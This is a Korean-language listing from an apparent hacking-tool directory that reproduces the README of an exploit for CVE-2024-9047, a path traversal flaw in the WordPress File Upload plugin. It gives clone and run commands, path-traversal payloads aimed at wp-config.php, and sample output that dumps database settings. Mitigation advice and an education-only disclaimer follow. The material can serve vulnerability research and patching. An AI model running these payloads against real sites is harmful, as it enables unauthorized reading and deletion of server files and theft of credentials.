Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-9047-Exploit — WordPress File Upload Plugin용 익스플로잇 - 4.24.11까지의 모든 버전이 취약합니다. | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-9047-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

WordPress File Upload Plugin용 익스플로잇 - 4.24.11까지의 모든 버전이 취약합니다.

저장소 보기
411년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-9047: WordPress File Upload 플러그인용 익스플로잇

설명

WordPress File Upload 플러그인은 4.24.11 이하의 모든 버전에서 wfu_file_downloader.php 파일을 통해 경로 탐색(Path Traversal) 취약점에 노출됩니다. 이 취약점으로 인해 인증되지 않은 공격자가 의도된 디렉터리 외부의 파일을 읽거나 삭제할 수 있습니다. 성공적인 악용을 위해서는 대상 WordPress 설치 환경이 PHP 7.4 이하에서 실행되고 있어야 합니다.

영향

  • 심각도: 치명적
  • CVSS 점수: 9.8 (치명적)
  • 공격 벡터: 네트워크
  • 인증 필요: 아니요

악용

공격자는 취약한 엔드포인트인 wfu_file_downloader.php에 특수하게 조작된 요청을 보내고 파일 경로 매개변수를 조작하여 서버의 민감한 파일에 무단으로 액세스할 수 있습니다.


익스플로잇 세부 정보

요구 사항

  • 대상 WordPress 설치 환경에는 취약한 플러그인(4.24.11 이하)이 설치되어 있어야 합니다.
  • 서버는 PHP 7.4 이하 버전을 실행해야 합니다.

악용 단계

  1. 이 저장소를 클론하세요:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. 필요한 경우 Python 종속성을 설치하세요:

    root@kitploit:~
    pip install requests
    
  3. 스크립트를 실행하여 플러그인 버전을 확인하고 취약점을 악용하세요:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

사용 예시

기본 취약한 구성을 악용하여 WordPress 구성 파일을 읽으려면:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

결과

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


완화 방법

WordPress 사이트를 보호하려면:

  1. WordPress File Upload 플러그인을 최신 버전으로 업데이트하세요.
  2. PHP 버전이 지원되는 버전(7.4보다 높은 버전)으로 업데이트되었는지 확인하세요.
  3. 민감한 파일에 대한 무단 액세스를 방지하기 위해 파일 권한을 제한하세요.
  4. 악성 요청을 차단하려면 웹 애플리케이션 방화벽(WAF)을 사용하세요.

면책 조항

이 코드는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에서 이 스크립트를 무단으로 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드